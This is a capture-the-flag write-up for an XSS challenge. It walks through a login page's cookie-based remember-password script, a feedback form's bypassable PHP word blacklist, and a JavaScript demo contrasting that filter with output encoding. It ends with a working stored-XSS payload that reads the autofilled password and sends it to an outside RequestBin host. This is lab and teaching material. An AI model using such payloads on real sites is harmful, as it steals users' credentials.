Pressing F12 on the login page shows <script src="./js/login.js"></script>; opening that file reveals part of its source:
    // "Remember password" feature: parse document.cookie into a key/value map.
    if (document.cookie && document.cookie != '') {
        var cookies = document.cookie.split('; ');
        var cookie = {};
        for (var i = 0; i < cookies.length; i++) {
            var arr = cookies[i].split('=');
            var key = arr[0];
            cookie[key] = arr[1];
        }
        // If both the user and psw cookies exist, write them into the form fields.
        // The password therefore lands in the DOM, where any script running on the page can read it.
        if (typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined") {
            document.getElementsByName("username")[0].value = cookie['user'];
            document.getElementsByName("password")[0].value = cookie['psw'];
        }
    }
This code fills the username and password from cookies into the form (a "remember password" feature). Next, register an arbitrary user and log in. Once inside, the page tells us this challenge is not injection. Clicking "feedback" at the top reveals an input box, and F12 shows source code in an HTML comment:
    if (is_array($feedback)) {
        echo "<script>alert('反馈不合法');</script>";  // "feedback is invalid"
        return false;
    }
    $blacklist = ['_', '\'', '&', '\\', '#', '%', 'input', 'script', 'iframe', 'host', 'onload', 'onerror', 'srcdoc', 'location', 'svg', 'form', 'img', 'src', 'getElement', 'document', 'cookie'];
    foreach ($blacklist as $val) {
        // Strip this word until no occurrence remains, then move on to the next word.
        // Words earlier in the list are never checked again.
        while (true) {
            if (stripos($feedback, $val) !== false) {
                $feedback = str_ireplace($val, "", $feedback);
            } else {
                break;
            }
        }
    }
From the blacklist contents and the input box we can guess this is XSS. The filter only replaces each blacklisted word with the empty string, which is easy to bypass: for example, write input as incookieput. (cookie is inserted because it is the last word in the blacklist; once cookie has been stripped out, the loop is finished, so the reassembled input is never checked again.)
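To make the weakness of this filter concrete, here is an added example (not the challenge's or the writeup's own code) that reimplements the PHP blacklist loop in JavaScript, shows how removing the last word reassembles an earlier one, and contrasts it with output encoding, which is the fix a defender would actually apply. The blacklist is copied from the PHP above; the sample string is constructed from the writeup's split-word trick; the function names are my own.

```javascript
// Added example (not the challenge's own code): reimplements the feedback
// handler's blacklist stripping so its weakness can be checked offline, then
// contrasts it with output encoding, which is the real fix.

// Blacklist copied from the PHP snippet in the writeup.
const BLACKLIST = [
  '_', "'", '&', '\\', '#', '%', 'input', 'script', 'iframe', 'host',
  'onload', 'onerror', 'srcdoc', 'location', 'svg', 'form', 'img', 'src',
  'getElement', 'document', 'cookie',
];

// Case-insensitive removal of every occurrence of `needle` in one
// left-to-right pass, like PHP's str_ireplace($needle, "", $haystack).
function removeAllCI(haystack, needle) {
  const lowerNeedle = needle.toLowerCase();
  let out = '';
  let rest = haystack;
  for (;;) {
    const idx = rest.toLowerCase().indexOf(lowerNeedle);
    if (idx === -1) return out + rest;
    out += rest.slice(0, idx);
    rest = rest.slice(idx + needle.length);
  }
}

// The challenge's filter: for each word, strip until that word is gone, then
// move on. Words earlier in the list are never re-checked, so removing a
// later word (cookie) can re-assemble an earlier one (input).
function challengeFilter(feedback) {
  let text = feedback;
  for (const word of BLACKLIST) {
    while (text.toLowerCase().includes(word.toLowerCase())) {
      text = removeAllCI(text, word);
    }
  }
  return text;
}

// Fixed-point variant: rerun the whole list until nothing changes. This closes
// the re-assembly hole but is still a denylist: anything not listed, and any
// bare '<', still reaches the page as markup.
function fixedPointFilter(feedback) {
  let prev;
  let text = feedback;
  do {
    prev = text;
    text = challengeFilter(text);
  } while (text !== prev);
  return text;
}

// Output encoding for an HTML text context (the htmlspecialchars approach):
// the browser renders the feedback as text and never parses it as markup,
// regardless of which words it contains.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Constructed sample: one element from the writeup's split-word trick.
const SAMPLE = '<inpcookieut type="text" name="username">';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('challenge filter :', challengeFilter(SAMPLE));
  console.log('fixed-point      :', fixedPointFilter(SAMPLE));
  console.log('escaped          :', escapeHtml(SAMPLE));
}
```

Running it shows the challenge filter turning the sample back into a live `<input ...>` tag, the fixed-point variant leaving a stray `<` that is still parsed as a tag, and the escaped version containing no markup at all. The lesson for the defender is that the fix belongs at the output (context-aware encoding), not in a word list over the input.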
A writeup by a more experienced player notes that this challenge has a CSP, so external JS cannot be loaded; instead we work with the challenge's own JS. login.js has the remember-password feature, so we build a payload, submit it through the feedback input box, and use BUU's RequestBin to receive the result.
payload:
    <inpcookieut type="text" name="username"></inpcookieut>
    <inpcookieut type="text" name="password"></inpcookieut>
    <scricookiept scookierc="./js/login.js"></scricookiept>
    <scricookiept>
        var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
        documcookieent.locacookietion="http://http.requestbin.buuoj.cn/s4dpjps4/?a="+passwd;
    </scricookiept>
After the submission succeeds, wait a little while and the flag shows up in RequestBin.